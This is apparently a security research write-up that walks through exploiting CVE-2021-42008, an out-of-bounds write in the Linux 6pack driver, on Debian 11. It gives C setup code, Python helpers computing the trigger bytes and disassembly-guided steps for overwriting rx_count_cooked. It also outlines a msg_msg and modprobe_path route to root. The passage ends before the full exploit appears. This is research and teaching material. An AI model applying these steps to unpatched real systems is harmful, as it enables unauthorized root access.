[CVE-2021-42008] Exploiting A 16-Year-Old Vulnerability In The Linux 6pack Driver

CVE-2021-42008 is a Slab-Out-Of-Bounds Write vulnerability in the Linux 6pack driver, caused by a missing size validation check in the decode_data() function. A malicious input from a process with the CAP_NET_ADMIN capability can overflow the cooked_buf field of the sixpack structure, corrupting kernel memory. If properly exploited, this can lead to root access. In this article, after analyzing the vulnerability, we will exploit it using the techniques FizzBuzz101 and I presented in our recent articles Fire Of Salvation and Wall Of Perdition, bypassing all modern kernel protections. Then, we will evaluate other approaches to perform privilege escalation.

Overview

6pack is a transmission protocol for data exchange between a PC and a TNC (Terminal Node Controller) over a serial line. It is used as an alternative to the KISS protocol for networking over AX.25. AX.25 is a data link layer protocol extensively used on amateur packet radio networks (and interestingly by some satellites, for example 3CAT2).

The vulnerability we are going to exploit has been present since commit 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2, the initial import of the Linux source tree into git (Linux-2.6.12-rc2) back in 2005. It was found by Syzbot and recently fixed by commit 19d1532a187669ce86d5a2696eb7275310070793. Every unpatched kernel version before 5.13.13 is affected.

As we mentioned in the introduction, the vulnerability is caused by a missing size validation check in the decode_data() function. A malicious input received over the sixpack channel from a process with the CAP_NET_ADMIN capability can cause sixpack_decode() to call decode_data() multiple times.

The malicious input is then decoded and stored in a buffer, cooked_buf, inside the sixpack structure. The variable rx_count_cooked is used as an index into cooked_buf: it determines where the next decoded byte is written.

The problem is that each call to decode_data() increments rx_count_cooked. With enough calls, it exceeds the size of cooked_buf, which can hold at most 400 bytes. The result is a Slab-Out-Of-Bounds Write that, if properly exploited, can lead to root access.

To exploit the vulnerability, we are going to target one of the latest Debian 11 versions. It can be downloaded from here. The exploit is designed and tested for kernel 5.10.0-8-amd64. All modern protections, such as KASLR, SMEP, SMAP, PTI, CONFIG_SLAB_FREELIST_RANDOM, CONFIG_SLAB_FREELIST_HARDENED, CONFIG_HARDENED_USERCOPY etc. are enabled.

Analyzing The Vulnerable Driver

In modern Linux distributions, 6pack is usually compiled as a Loadable Kernel Module. The module can be loaded into the kernel by setting the line discipline of a tty to N_6PACK. To do so, we can create a ptmx/pts pair (respectively the master side and the slave side of a pty) and set the line discipline of the slave to N_6PACK:

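#define _GNU_SOURCE // getpt(), ptsname()
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/ioctl.h>
#include <unistd.h>

#define N_6PACK 7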

int open_ptmx(void)
{
    int ptmx;

    ptmx = getpt();

    if (ptmx < 0)
    {
        perror("[X] open_ptmx()");
        exit(1);
    }

    grantpt(ptmx);
    unlockpt(ptmx);

    return ptmx;
}


int open_pts(int fd)
{
    int pts;

    pts = open(ptsname(fd), 0, 0);

    if (pts < 0)
    {
        perror("[X] open_pts()");
        exit(1);
    }

    return pts;
}


void set_line_discipline(int fd, int ldisc)
{
    if (ioctl(fd, TIOCSETD, &ldisc) < 0) // [2]
    {
        perror("[X] ioctl() TIOCSETD");
        exit(1);
    }
}


int init_sixpack()
{
    int ptmx, pts;

    ptmx = open_ptmx();
    pts = open_pts(ptmx);

    set_line_discipline(pts, N_6PACK); // [1]

    return ptmx;
}

After opening a ptmx and the respective slave side, we set the line discipline of the pts to N_6PACK [1] using the function set_line_discipline() [2].

Line discipline, also known as LDISC, acts as an intermediate level between a character device and a pseudo terminal (or real hardware), determining the semantics associated with the device.

For example, the line discipline maps a special character to a specific signal. When the user presses CTRL + C in a terminal, the resulting ^C character is mapped to SIGINT. To learn more about tty, pty, ptmx/pts and ldisc, I recommend reading The TTY demystified.

Once we set the pts line discipline to N_6PACK, the 6pack driver is initialized by sixpack_init_driver():

static int __init sixpack_init_driver(void)
{
    int status;

    printk(msg_banner);

    /* Register the provided line protocol discipline */
    if ((status = tty_register_ldisc(N_6PACK, &sp_ldisc)) != 0) // [1]
        printk(msg_regfail, status);

    return status;
}

and tty_register_ldisc() is called to register the new line discipline [1]. The second argument, sp_ldisc, is defined as:

static struct tty_ldisc_ops sp_ldisc = {
    .owner        = THIS_MODULE,
    .magic        = TTY_LDISC_MAGIC,
    .name         = "6pack",
    .open         = sixpack_open,
    .close        = sixpack_close,
    .ioctl        = sixpack_ioctl,
    .receive_buf  = sixpack_receive_buf,
    .write_wakeup = sixpack_write_wakeup,
};

Afterwards the sixpack channel is opened by sixpack_open():

static int sixpack_open(struct tty_struct *tty)
{
    char *rbuff = NULL, *xbuff = NULL;
    struct net_device *dev;
    struct sixpack *sp;
    unsigned long len;
    int err = 0;

    if (!capable(CAP_NET_ADMIN)) // [1]
        return -EPERM;
    if (tty->ops->write == NULL)
        return -EOPNOTSUPP;

    dev = alloc_netdev(sizeof(struct sixpack), "sp%d", NET_NAME_UNKNOWN,
                sp_setup); // [2]
    if (!dev) {
        err = -ENOMEM;
        goto out;
    }

    sp = netdev_priv(dev); // [3]
    sp->dev = dev;

    [...]

    sp->status      = 1; // [4]

    [...]

    timer_setup(&sp->tx_t, sp_xmit_on_air, 0);
    timer_setup(&sp->resync_t, resync_tnc, 0); // [5]

    [...]

    tty->disc_data = sp; // [6]
    tty->receive_room = 65536;

    /* Now we're ready to register. */
    err = register_netdev(dev);
    if (err)
        goto out_free;

    tnc_init(sp); // [7]

    return 0;

    [...]
}

From the source code above, we can see that only a process with the CAP_NET_ADMIN capability is allowed to interact with the 6pack driver [1]. Fortunately, this makes the vulnerability harder to exploit in the wild.

Then, a net device is allocated using alloc_netdev() which is a macro for alloc_netdev_mqs() [2]:

[...]

alloc_size = sizeof(struct net_device); // [2.1] 0x940 bytes
if (sizeof_priv) {
    /* ensure 32-byte alignment of private area */
    alloc_size = ALIGN(alloc_size, NETDEV_ALIGN);
    alloc_size += sizeof_priv; // [2.2] 0x270 bytes
}
/* ensure 32-byte alignment of whole construct */
alloc_size += NETDEV_ALIGN - 1;

p = kvzalloc(alloc_size, GFP_KERNEL | __GFP_RETRY_MAYFAIL); // [2.3]
if (!p)
    return NULL;

dev = PTR_ALIGN(p, NETDEV_ALIGN);

[...]

As we can see from the alloc_netdev_mqs() source code, it first calculates the size of a net_device structure, 0x940 bytes in our case [2.1]. It then adds the value of sizeof_priv, which corresponds to the size of a sixpack structure, 0x270 bytes in our case [2.2]. After alignment, this results in an allocation of 0xbcf bytes, which ends up in kmalloc-4k [2.3].
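The arithmetic can be double-checked with a small Python sketch of the size computation. It hard-codes the sizes reported above for this kernel build (0x940 and 0x270) and NETDEV_ALIGN = 32. It also uses a simplified, hypothetical table of generic kmalloc size classes instead of the allocator's real lookup logic.

```python
NETDEV_ALIGN = 32

# Simplified table of generic kmalloc size classes (illustrative assumption).
KMALLOC_SIZES = [8, 16, 32, 64, 96, 128, 192, 256, 512, 1024, 2048, 4096, 8192]


def align(x, a):
    """Round x up to a multiple of a (a power of two), like the kernel's ALIGN()."""
    return (x + a - 1) & ~(a - 1)


def netdev_alloc_size(sizeof_net_device, sizeof_priv):
    """Mirror the size computation of alloc_netdev_mqs()."""
    alloc_size = sizeof_net_device
    if sizeof_priv:
        alloc_size = align(alloc_size, NETDEV_ALIGN)  # 32-byte aligned private area
        alloc_size += sizeof_priv
    alloc_size += NETDEV_ALIGN - 1  # slack for PTR_ALIGN() on the whole construct
    return alloc_size


def kmalloc_bucket(size):
    """Return the smallest size class in the table that can hold `size` bytes."""
    for bucket in KMALLOC_SIZES:
        if size <= bucket:
            return bucket
    raise ValueError("size too large for this simplified table")


size = netdev_alloc_size(0x940, 0x270)
print(hex(size), kmalloc_bucket(size))  # 0xbcf 4096
```

Because 0x940 is already a multiple of 32, the first ALIGN() is a no-op here. Only the trailing NETDEV_ALIGN - 1 slack pushes the total from 0xbb0 to 0xbcf.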

Back in sixpack_open(), netdev_priv() is called right after alloc_netdev() [3]. It returns a pointer to the private data region of the newly allocated net device, which starts right after the 32-byte aligned net_device structure. This is where the sixpack structure lives.

Finally, after setting the status field of the sixpack structure to 1 [4] and initializing two timers (the function called when the second timer expires, resync_tnc(), will be extremely important in the exploitation phase) [5], the tty line is linked to the sixpack channel [6], the net device is registered, and tnc_init() is called [7]:

static inline int tnc_init(struct sixpack *sp)
{
    [...]

    mod_timer(&sp->resync_t, jiffies + SIXP_RESYNC_TIMEOUT); // [1]

    return 0;
}

Among other things, tnc_init() sets the expiration time of the sp->resync_t timer to jiffies + SIXP_RESYNC_TIMEOUT [1].

In the Linux kernel, jiffies is a global variable that stores the number of ticks since the system booted. It is incremented by one at each timer interrupt. There are HZ ticks in one second, and the value of HZ is determined by CONFIG_HZ.

Since HZ is the number of ticks per second and jiffies is a number of ticks, we can convert between the two: sec = jiffies / HZ and jiffies = sec * HZ.

This is exactly what the Linux Kernel does to determine when a timer expires. For example, a timer that expires in 10 seconds from now can be represented in jiffies using jiffies + (10*HZ).

In our case, the timer is set to jiffies + SIXP_RESYNC_TIMEOUT. SIXP_RESYNC_TIMEOUT is equal to 5*HZ. This means that once the sixpack channel is initialized, the timer will expire after 5 seconds, triggering a call to resync_tnc(). We will analyze this function during the exploitation phase.
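The conversion can be sketched in a few lines of Python. HZ = 250 is only an assumption for illustration, since the real value depends on the CONFIG_HZ of the target kernel. The current jiffies value is also made up.

```python
HZ = 250  # assumption: the real value comes from CONFIG_HZ
SIXP_RESYNC_TIMEOUT = 5 * HZ


def seconds_to_jiffies(seconds, hz=HZ):
    return seconds * hz  # jiffies = sec * HZ


def jiffies_to_seconds(ticks, hz=HZ):
    return ticks / hz  # sec = jiffies / HZ


jiffies_now = 1_000_000  # hypothetical value of jiffies when tnc_init() runs
expires = jiffies_now + SIXP_RESYNC_TIMEOUT  # expiry passed to mod_timer()

print(expires - jiffies_now, jiffies_to_seconds(expires - jiffies_now))  # 1250 5.0
```

SIXP_RESYNC_TIMEOUT is defined as a multiple of HZ, so it always corresponds to five seconds whatever the value of HZ.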

Reaching The Vulnerable Function

Now that we can communicate with the sixpack driver, when we write to the ptmx, sixpack_receive_buf() is called, which in turn calls sixpack_decode():

static void sixpack_decode(struct sixpack *sp, const unsigned char *pre_rbuff, int count)
{
    unsigned char inbyte;
    int count1;

    for (count1 = 0; count1 < count; count1++) {
        inbyte = pre_rbuff[count1]; // [1]
        if (inbyte == SIXP_FOUND_TNC) {
            tnc_set_sync_state(sp, TNC_IN_SYNC);
            del_timer(&sp->resync_t);
        }
        if ((inbyte & SIXP_PRIO_CMD_MASK) != 0) // [2]
            decode_prio_command(sp, inbyte);
        else if ((inbyte & SIXP_STD_CMD_MASK) != 0) // [3]
            decode_std_command(sp, inbyte);
        else if ((sp->status & SIXP_RX_DCD_MASK) == SIXP_RX_DCD_MASK) // [4]
            decode_data(sp, inbyte);
    }
}

The relevant macros are defined in 6pack.c:

#define SIXP_FOUND_TNC      0xe9
#define SIXP_PRIO_CMD_MASK  0x80
#define SIXP_STD_CMD_MASK   0x40
#define SIXP_PRIO_DATA_MASK 0x38
#define SIXP_RX_DCD_MASK    0x18
#define SIXP_DCD_MASK       0x08

sixpack_decode() will loop through the buffer we sent over the sixpack channel, now stored in pre_rbuff [1], and based on the value of each byte (inbyte), it will take different paths.

To reach the vulnerable function, decode_data(), we must force sixpack_decode() to take the last path [4]. To do so, we need to satisfy multiple conditions:

A. inbyte & SIXP_PRIO_CMD_MASK must be zero, otherwise decode_prio_command() will be called instead of decode_data() [2].

B. inbyte & SIXP_STD_CMD_MASK must be zero, otherwise decode_std_command() will be called instead of decode_data() [3].

C. sp->status & SIXP_RX_DCD_MASK must be equal to SIXP_RX_DCD_MASK [4].

Since we control the value of each byte in our buffer, the first two conditions are easy to satisfy. The hardest one is C.
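As a quick sanity check, the following Python sketch mirrors the if/else chain of sixpack_decode() and shows that conditions A and B hold exactly for bytes below 0x40. It ignores the SIXP_FOUND_TNC special case, since 0xe9 takes the priority path anyway. The mask values come from 6pack.c, and decode_path() is a hypothetical helper.

```python
SIXP_PRIO_CMD_MASK = 0x80
SIXP_STD_CMD_MASK = 0x40
SIXP_RX_DCD_MASK = 0x18


def decode_path(inbyte, status):
    """Return the function sixpack_decode() would call for `inbyte` (None if ignored)."""
    if inbyte & SIXP_PRIO_CMD_MASK:                       # path [2]
        return "decode_prio_command"
    if inbyte & SIXP_STD_CMD_MASK:                        # path [3]
        return "decode_std_command"
    if (status & SIXP_RX_DCD_MASK) == SIXP_RX_DCD_MASK:   # path [4], condition C
        return "decode_data"
    return None


data_bytes = [b for b in range(0x100) if decode_path(b, 0x18) == "decode_data"]
print(hex(min(data_bytes)), hex(max(data_bytes)), len(data_bytes))  # 0x0 0x3f 64
print(decode_path(0x10, 1))  # None: with the initial status, data bytes are dropped
```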

When a sixpack structure is initialized by sixpack_open(), the status variable is set to 1. Although we have no direct control over this variable, we can still indirectly modify it by taking the decode_prio_command() path [2]:

static void decode_prio_command(struct sixpack *sp, unsigned char cmd)
{
    int actual;

    if ((cmd & SIXP_PRIO_DATA_MASK) != 0) { // [1]

        if (((sp->status & SIXP_DCD_MASK) == 0) &&
            ((cmd & SIXP_RX_DCD_MASK) == SIXP_RX_DCD_MASK)) { // [2]
                if (sp->status != 1)
                    printk(KERN_DEBUG "6pack: protocol violation\n");
                else
                    sp->status = 0;
                cmd &= ~SIXP_RX_DCD_MASK; // [3]
        }
        sp->status = cmd & SIXP_PRIO_DATA_MASK; // [4]
    } else { /* output watchdog char if idle */

            [...]

    }

    [...]
}

When decode_prio_command() is called and we satisfy the first check [1], we can control sp->status through the line sp->status = cmd & SIXP_PRIO_DATA_MASK [4]. This is exactly what we need, since we control the value of cmd.

Easy, right? No. We have a problem. If the second check [2] is satisfied, the SIXP_RX_DCD_MASK bits are cleared from cmd by the line cmd &= ~SIXP_RX_DCD_MASK [3]. Unfortunately, on the first call both parts of that check hold:

- To satisfy condition C and reach decode_data(), cmd must have all the SIXP_RX_DCD_MASK bits set, so (cmd & SIXP_RX_DCD_MASK) == SIXP_RX_DCD_MASK is true.
- sp->status is still 1 when decode_prio_command() is called for the first time, so (sp->status & SIXP_DCD_MASK) == 0 is true as well.

Fortunately, we can easily work around the problem by calling decode_prio_command() twice: The first time, we set sp->status to a certain value, such that when decode_prio_command() is called again, the first part of the second check (sp->status & SIXP_DCD_MASK) == 0 [2] is not satisfied. Then, calling decode_prio_command() again with a specific value as input, we will be able to skip the line cmd &= ~SIXP_RX_DCD_MASK [3] and set sp->status to a value that can satisfy condition C.

The following python script will compute the correct bytes for us:

SIXP_PRIO_CMD_MASK  = 0x80
SIXP_PRIO_DATA_MASK = 0x38
SIXP_RX_DCD_MASK    = 0x18

print("[*] First call to decode_prio_command():")
for byte in range(0x100):
    x = byte
    if (x & SIXP_PRIO_CMD_MASK) != 0: # To call decode_prio_command()
        if (x & SIXP_PRIO_DATA_MASK) != 0: # [1] in decode_prio_command()
            if (x & SIXP_RX_DCD_MASK) != SIXP_RX_DCD_MASK: # [2] in decode_prio_command()
                x = x & SIXP_PRIO_DATA_MASK # [3] in decode_prio_command()
                print(f"Input: {hex(byte)} => sp->status = {hex(x)}\n")
                break

print("[*] Second call to decode_prio_command():")
for byte in range(0x100):
    x = byte
    if (x & SIXP_PRIO_CMD_MASK) != 0: # To call decode_prio_command()
        if (x & SIXP_PRIO_DATA_MASK) != 0: # [1] in decode_prio_command()
            if (x & SIXP_RX_DCD_MASK) == SIXP_RX_DCD_MASK: # To reach decode_data()
                x = x & SIXP_PRIO_DATA_MASK # [3] in decode_prio_command()
                print(f"Input: {hex(byte)} => sp->status = {hex(x)}")
                break

Executing the script above, we get the following result:

[*] First call to decode_prio_command():
Input: 0x88 => sp->status = 0x8

[*] Second call to decode_prio_command():
Input: 0x98 => sp->status = 0x18

This means that if decode_prio_command() is first called with 0x88 as input, sp->status is set to 0x8. When the function is called again with 0x98 as input, the second check [2] is not satisfied, because sp->status is now 0x8 and (0x8 & SIXP_DCD_MASK) != 0. As a result, we skip the line cmd &= ~SIXP_RX_DCD_MASK [3] and set sp->status to 0x18 through the line sp->status = cmd & SIXP_PRIO_DATA_MASK [4].

At this point we can satisfy condition C, (sp->status & SIXP_RX_DCD_MASK) == SIXP_RX_DCD_MASK, in sixpack_decode(), and reach the vulnerable function decode_data(). Let’s proceed by examining its source code:
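The two-step trick can be replayed with a minimal Python model of the decode_prio_command() branch shown above. The model makes three simplifying assumptions:

- Only sp->status is modelled.
- The elided watchdog branch is assumed to leave sp->status untouched.
- The temporary sp->status = 0 assignment is omitted, because line [4] overwrites it anyway.

```python
SIXP_PRIO_DATA_MASK = 0x38
SIXP_RX_DCD_MASK = 0x18
SIXP_DCD_MASK = 0x08


def prio_status_update(status, cmd):
    """Return the new sp->status after decode_prio_command(sp, cmd) (simplified)."""
    if cmd & SIXP_PRIO_DATA_MASK:                                 # check [1]
        if (status & SIXP_DCD_MASK) == 0 and \
           (cmd & SIXP_RX_DCD_MASK) == SIXP_RX_DCD_MASK:          # check [2]
            cmd &= ~SIXP_RX_DCD_MASK                              # line [3]
        status = cmd & SIXP_PRIO_DATA_MASK                        # line [4]
    return status


def reaches_decode_data(status):
    return (status & SIXP_RX_DCD_MASK) == SIXP_RX_DCD_MASK        # condition C


one_shot = prio_status_update(1, 0x98)  # 0x98 alone: its RX/DCD bits are cleared by [3]
status = prio_status_update(1, 0x88)    # first call, starting from the initial status 1
status = prio_status_update(status, 0x98)  # second call
print(hex(one_shot), hex(status), reaches_decode_data(status))  # 0x0 0x18 True
```

Sending 0x98 alone leaves sp->status at 0, so the preceding 0x88 is what makes the second byte effective.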

static void decode_data(struct sixpack *sp, unsigned char inbyte)
{
    unsigned char *buf;

    if (sp->rx_count != 3) {
        sp->raw_buf[sp->rx_count++] = inbyte; // [1]

        return;
    }

    // [2]
    buf = sp->raw_buf; 
    sp->cooked_buf[sp->rx_count_cooked++] =
        buf[0] | ((buf[1] << 2) & 0xc0);
    sp->cooked_buf[sp->rx_count_cooked++] =
        (buf[1] & 0x0f) | ((buf[2] << 2) & 0xf0);
    sp->cooked_buf[sp->rx_count_cooked++] =
        (buf[2] & 0x03) | (inbyte << 2);
    sp->rx_count = 0;
}

For our discussion, we also need to take into account the following fields of the sixpack structure:

struct sixpack {

    [...]

    unsigned char       raw_buf[4];
    unsigned char       cooked_buf[400];

    unsigned int        rx_count;
    unsigned int        rx_count_cooked;

    [...]

    unsigned char       status;

    [...]
};

Every time decode_data() is called, one byte is copied from our buffer to sp->raw_buf [1]. Once sp->raw_buf holds three bytes, the next call decodes them, together with the new inbyte, into three bytes and writes them to another buffer, sp->cooked_buf [2]. As we can see from the sixpack structure above, this buffer can hold at most 400 bytes. The variable sp->rx_count_cooked is used as an index into sp->cooked_buf. It is incremented after each byte is written and is never checked against the buffer size.

From an attacker's perspective, knowing that the payload will pass through this function is not fun at all. Luckily, we can reuse part of the encode_sixpack() function in our exploit to encode the malicious payload. Once sixpack_decode() receives it, decode_data() decodes it, and we control the values written to memory.

Here is the encode_sixpack() part we are interested in:

static int encode_sixpack(unsigned char *tx_buf, unsigned char *tx_buf_raw,
    int length, unsigned char tx_delay)
{
    [...]

    for (count = 0; count <= length; count++) {
        if ((count % 3) == 0) {
            tx_buf_raw[raw_count++] = (buf[count] & 0x3f);
            tx_buf_raw[raw_count] = ((buf[count] >> 2) & 0x30);
        } else if ((count % 3) == 1) {
            tx_buf_raw[raw_count++] |= (buf[count] & 0x0f);
            tx_buf_raw[raw_count] =  ((buf[count] >> 2) & 0x3c);
        } else {
            tx_buf_raw[raw_count++] |= (buf[count] & 0x03);
            tx_buf_raw[raw_count++] = (buf[count] >> 2);
        }
    }

    [...]

    return raw_count;
}
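To check that encode_sixpack() is the inverse of decode_data(), we can port both bit manipulations to Python and verify the round trip. The sketch packs three bytes into four 6-bit values. As a result, every encoded byte is below 0x40, which means it satisfies conditions A and B. The helper names are hypothetical, and inputs are assumed to be a multiple of three bytes long.

```python
def encode_triplet(b0, b1, b2):
    """Pack three bytes into four 6-bit values, like the loop in encode_sixpack()."""
    return [
        b0 & 0x3f,
        ((b0 >> 2) & 0x30) | (b1 & 0x0f),
        ((b1 >> 2) & 0x3c) | (b2 & 0x03),
        b2 >> 2,
    ]


def decode_triplet(raw0, raw1, raw2, inbyte):
    """Rebuild three bytes as decode_data() does from raw_buf[0..2] and inbyte.
    The & 0xff mimics the truncation to unsigned char in the kernel."""
    return [
        (raw0 | ((raw1 << 2) & 0xc0)) & 0xff,
        ((raw1 & 0x0f) | ((raw2 << 2) & 0xf0)) & 0xff,
        ((raw2 & 0x03) | (inbyte << 2)) & 0xff,
    ]


def encode(data):
    """Encode `data`; its length is assumed to be a multiple of three."""
    out = []
    for i in range(0, len(data), 3):
        out += encode_triplet(*data[i:i + 3])
    return out


def decode(raw):
    """Decode groups of four 6-bit values back into bytes."""
    out = []
    for i in range(0, len(raw), 4):
        out += decode_triplet(*raw[i:i + 4])
    return bytes(out)


payload = bytes(range(0x30))  # hypothetical 48-byte payload
raw = encode(payload)
print(decode(raw) == payload, all(r < 0x40 for r in raw))  # True True
```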

Now that we know how to reach the vulnerable function, we can finally start planning our exploit.

Exploitation Plan

The first thing to consider is the layout of the sixpack structure in memory. Let’s take a look at its source code again:

struct sixpack {

    [...]

    unsigned char       raw_buf[4];
    unsigned char       cooked_buf[400]; // [1]

    unsigned int        rx_count; // [2]
    unsigned int        rx_count_cooked; // [3]

    [...]
};

As we can see, if we manage to overflow the cooked_buf array [1], we will inevitably overwrite the rx_count variable [2] and the rx_count_cooked variable [3] in memory. Here is a visual representation:

We know that decode_data() uses rx_count_cooked as an index into cooked_buf. If we do the math correctly, we can use the overflow to set it to a large value. decode_data() will then write the rest of the decoded payload into the next object in memory.

Assuming we can achieve this goal, we need an object that we can spray in kmalloc-4k and that, once corrupted by our Out-Of-Bounds Write, can give us arbitrary read and arbitrary write. If you have read my latest article, you already know that msg_msg is exactly what we need:

struct msg_msg {
    struct list_head m_list;
    long m_type;
    size_t m_ts; // [1]
    struct msg_msgseg *next; // [2]
    void *security;
    /* the actual message follows immediately */
};

In our recent articles, Fire Of Salvation and Wall Of Perdition, FizzBuzz101 and I discussed at length how to use msg_msg objects to achieve arbitrary read and arbitrary write.

Before continuing, I recommend reading these articles to better understand how this object can be exploited. From here on, I will assume you already know how msg_msg objects can be used in kernel exploitation.

Suppose we manage to get a msg_msg object allocated next to the sixpack structure, with its segment allocated in kmalloc-32. We can then use our Out-Of-Bounds Write primitive to corrupt the m_ts field of the message [1], which determines its size, setting it to a large value. Using msgrcv(), we will then obtain an Out-Of-Bounds Read primitive in kmalloc-32, get an information leak and bypass KASLR.

Similarly, to achieve arbitrary write, we can spray many msg_msg objects in kmalloc-4k and their respective segments in kmalloc-32, then for each object we can suspend the call to copy_from_user() in load_msg() using userfaultfd (there are alternatives to userfaultfd, we will discuss them in the Conclusion section). Afterwards, once one of these messages is allocated right after our sixpack structure, we corrupt its next pointer [2], setting it to the address where we want to write.

In our exploit, we will target modprobe_path, but there are many other valid targets, for example the current task’s cred structure.

Once the copy_from_user() calls are released, we will be able to replace the modprobe_path string with the path of a malicious binary. The kernel will then execute that program, which gives us root privileges.

At this point, with this plan in mind, we are ready to start writing our exploit!

The Exploit

First of all we need to do some calculations to get the distance between sp->cooked_buf and sp->rx_count_cooked, and the distance between sp->cooked_buf and the next object in memory. In our case, the address of sp->rx_count_cooked corresponds to sp->cooked_buf[0x194] and the address of the next object in memory corresponds to sp->cooked_buf[0x688].

Since we know that sp->rx_count_cooked is used as index inside sp->cooked_buf, if we want to write to the next object in memory, we need to set its value to x, where x >= 0x688.
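These distances can be reconstructed from values we already have. The Python sketch below relies on three inputs:

- The field offsets from the decode_data() disassembly in this section: cooked_buf at 0x38, rx_count at 0x1c8 and rx_count_cooked at 0x1cc.
- The 0x940-byte net_device size reported earlier.
- The assumption that the net_device starts at the beginning of a 4096-byte-aligned kmalloc-4k object, so that PTR_ALIGN() does not shift it.

```python
SIZEOF_NET_DEVICE = 0x940  # reported for 5.10.0-8-amd64
NETDEV_ALIGN = 32
OBJ_SIZE = 0x1000          # kmalloc-4k object size

# Field offsets inside struct sixpack, read off the decode_data() disassembly.
OFF_COOKED_BUF = 0x38
OFF_RX_COUNT = 0x1c8
OFF_RX_COUNT_COOKED = 0x1cc


def align(x, a):
    return (x + a - 1) & ~(a - 1)


# Assumption: dev == p, so netdev_priv(dev) == p + ALIGN(sizeof(struct net_device), 32).
priv = align(SIZEOF_NET_DEVICE, NETDEV_ALIGN)
cooked_buf = priv + OFF_COOKED_BUF  # offset of sp->cooked_buf inside the object

print(hex(OFF_RX_COUNT - OFF_COOKED_BUF),         # 0x190: right after cooked_buf[400]
      hex(OFF_RX_COUNT_COOKED - OFF_COOKED_BUF),  # 0x194
      hex(OBJ_SIZE - cooked_buf))                 # 0x688: start of the next object
```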

Again: easy, right? No. We need to consider the effect of GCC optimizations on the vulnerable function decode_data():

static void decode_data(struct sixpack *sp, unsigned char inbyte)
{
    unsigned char *buf;

    [...]

    buf = sp->raw_buf;
    sp->cooked_buf[sp->rx_count_cooked++] =
        buf[0] | ((buf[1] << 2) & 0xc0);
    sp->cooked_buf[sp->rx_count_cooked++] =
        (buf[1] & 0x0f) | ((buf[2] << 2) & 0xf0);
    sp->cooked_buf[sp->rx_count_cooked++] =
        (buf[2] & 0x03) | (inbyte << 2);
    sp->rx_count = 0;
}

decode_data + 00:        nop    DWORD PTR [rax+rax*1+0x0]
decode_data + 05:        movzx  r8d,BYTE PTR [rdi+0x35] // r8d = sp->raw_buf[1]
decode_data + 10: [1]    mov    eax,DWORD PTR [rdi+0x1cc] // eax = sp->rx_count_cooked
decode_data + 16:        shl    esi,0x2
decode_data + 19:        lea    edx,[r8*4+0x0]
decode_data + 27: [2]    mov    rcx,rax // rcx = sp->rx_count_cooked
decode_data + 30:        lea    r9d,[rax+0x1] // r9d = sp->rx_count_cooked + 1
decode_data + 34:        and    r8d,0xf
decode_data + 38:        and    edx,0xffffffc0
decode_data + 41:        or     dl,BYTE PTR [rdi+0x34] // dl |= sp->raw_buf[0]
decode_data + 44: [3]    mov    BYTE PTR [rdi+rax*1+0x38],dl // Write first decoded byte in sp->cooked_buf
decode_data + 48:        movzx  edx,BYTE PTR [rdi+0x36] // edx = sp->raw_buf[2]
decode_data + 52:        lea    eax,[rdx*4+0x0]
decode_data + 59:        and    edx,0x3
decode_data + 62:        and    eax,0xfffffff0
decode_data + 65:        or     esi,edx
decode_data + 67:        or     eax,r8d
decode_data + 70: [4]    mov    BYTE PTR [rdi+r9*1+0x38],al // Write second decoded byte in sp->cooked_buf
decode_data + 75:        lea    eax,[rcx+0x3] // eax = sp->rx_count_cooked + 3
decode_data + 78: [5]    mov    DWORD PTR [rdi+0x1cc],eax //  sp->rx_count_cooked = sp->rx_count_cooked + 3
decode_data + 84:        lea    eax,[rcx+0x2] // eax = sp->rx_count_cooked + 2
decode_data + 87: [6]    mov    BYTE PTR [rdi+rax*1+0x38],sil // Write third decoded byte in sp->cooked_buf
decode_data + 92:        mov    DWORD PTR [rdi+0x1c8],0x0 // sp->rx_count = 0
decode_data + 102:       ret

The first important thing to note is that, predictably, GCC reads sp->rx_count_cooked only once when decode_data() is called with 3 bytes in sp->raw_buf. Instead of accessing the field for every write, the function loads it into EAX [1] and copies it into RCX [2] at the very beginning.

The second important thing is that the index is not updated after all three writes to sp->cooked_buf. Instead, before the third decoded byte is written [6], sp->rx_count_cooked is set to the previously loaded value [1] [2] + 3 [5].

This optimization makes things harder. Instructions [3] and [4] can overwrite bytes of sp->rx_count_cooked, but instruction [5] immediately replaces the whole field with the cached index + 3, discarding those changes. Only the third write [6], which happens after [5], can durably modify it.

This means that we need to use the third write operation [6] to overwrite the second byte of sp->rx_count_cooked, which corresponds to sp->cooked_buf[0x195]. For example, we can make it 0x06XX instead of 0x01XX.

Since decode_data() writes 3 bytes at a time starting from index 0 of sp->cooked_buf, the third byte of each call lands at index 0x2, 0x5, 0x8, …, 0x191, 0x194 and so on. When sp->rx_count_cooked is 0x192 and decode_data() is called again, the third write operation lands on sp->cooked_buf[0x194]. But we need the third decoded byte to overwrite sp->cooked_buf[0x195]! Oh, lovely GCC optimizations…

The problem can be solved by misaligning the writing frame: we set the first byte of sp->rx_count_cooked to 0x90, so that it becomes 0x190. This way, after two more calls to decode_data(), the third write operation will land on sp->cooked_buf[0x195].

Each time decode_data() is called, we basically have a pattern of three operations:

First, when sp->rx_count_cooked is equal to 0x192 and decode_data() is called again, instructions [3] and [4] write the first two bytes at sp->cooked_buf[0x192] and sp->cooked_buf[0x193] respectively.
Then instruction [5] updates sp->rx_count_cooked with its previously stored value + 3: 0x192 + 3: 0x195.
And finally the third write operation [6] overwrites the first byte of sp->rx_count_cooked which corresponds to sp->cooked_buf[0x194], making it 0x190.

Here is a visual representation:

Now sp->rx_count_cooked is equal to 0x190, and we successfully misaligned the writing frame. When decode_data() is called again, we have the same pattern of operations:

Write two bytes inside sp->cooked_buf (this time at sp->cooked_buf[0x190] and sp->cooked_buf[0x191])
Update sp->rx_count_cooked with its previously stored value + 3 (this time 0x190 + 3: 0x193)
Write the third byte (this time at sp->cooked_buf[0x192]):

And again, a new call to decode_data() will finally set sp->rx_count_cooked to 0x696. The pattern is always the same:

Write two bytes inside sp->cooked_buf (this time at sp->cooked_buf[0x193] and sp->cooked_buf[0x194])
Update sp->rx_count_cooked with its previously stored value + 3 (this time 0x193 + 3: 0x196)
Write the third byte (this time at sp->cooked_buf[0x195]):
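The whole sequence can be replayed with a small Python simulation of the compiled decode_data(). This is a sketch, not the kernel code. It makes the following simplifications:

- It feeds already-decoded payload bytes three at a time, skipping the 6-bit encoding.
- It models only sp->cooked_buf, sp->rx_count and sp->rx_count_cooked, as offsets from cooked_buf.
- It follows the instruction order [1] to [6], then the final sp->rx_count = 0.

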